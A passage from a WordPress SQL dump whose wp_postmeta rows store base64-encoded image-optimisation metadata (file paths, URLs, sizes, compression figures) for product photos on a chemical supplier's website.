jI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NzI2LCJpZCI6Mzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjcyOSwiaWQiOjM4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NjgsInRpbWUiOjE0ODM1ODY3MzEsImlkIjozODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3MzQsImlkIjozODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3MzYsImlkIjozODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3MzksImlkIjozODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NDEsImlkIjozODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9EYWItTy1NYXRpYy02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RhYi1PLU1hdGljLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRGFiLU8tTWF0aWMtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NDQsImlkIjozODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30201, 388, 'wpfc_optimisation_reduction', '367327'); 
INSERT INTO `wp_postmeta` VALUES (30202, 388, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLmpwZyIsIndpZHRoIjoxNTAwLCJoZWlnaHQiOjE1MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjozNjczMTQsInRpbWUiOjE0ODM1ODY3NTMsImlkIjoiMzg4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NTUsImlkIjozODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NzU4LCJpZCI6Mzg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Njc2MSwiaWQiOjM4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NjMsImlkIjozODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC0yMC1rZy01Z2FsLUp1Zy0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NzY1LCJpZCI6Mzg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtMjAta2ctNWdhbC1KdWctMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Njc2NywiaWQiOjM4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NzAsImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NzIsImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NzQsImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NzYsImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3NzksImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3ODEsImlkIjozODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTIwLWtnLTVnYWwtSnVnLTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3ODMsImlkIjozODh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30203, 387, 'wpfc_optimisation_reduction', '336618'); 
INSERT INTO `wp_postmeta` VALUES (30204, 387, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC01LWtnLUhhbmRsZS1KdWctMzAwLWRwaS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtNS1rZy1IYW5kbGUtSnVnLTMwMC1kcGkuanBnIiwid2lkdGgiOjE1MDAsImhlaWdodCI6MTUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtNS1rZy1IYW5kbGUtSnVnLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjozMzY1MDcsInRpbWUiOjE0ODM1ODY3OTIsImlkIjoiMzg3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtT0lMLTUta2ctSGFuZGxlLUp1Zy0zMDAtZHBpLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC01LWtnLUhhbmRsZS1KdWctMzAwLWRwaS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtNS1rZy1IYW5kbGUtSnVnLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY3OTQsImlkIjozODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LU9JTC01LWtnLUhhbmRsZS1KdWctMzAwLWRwaS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1PSUwtNS1rZy1IYW5k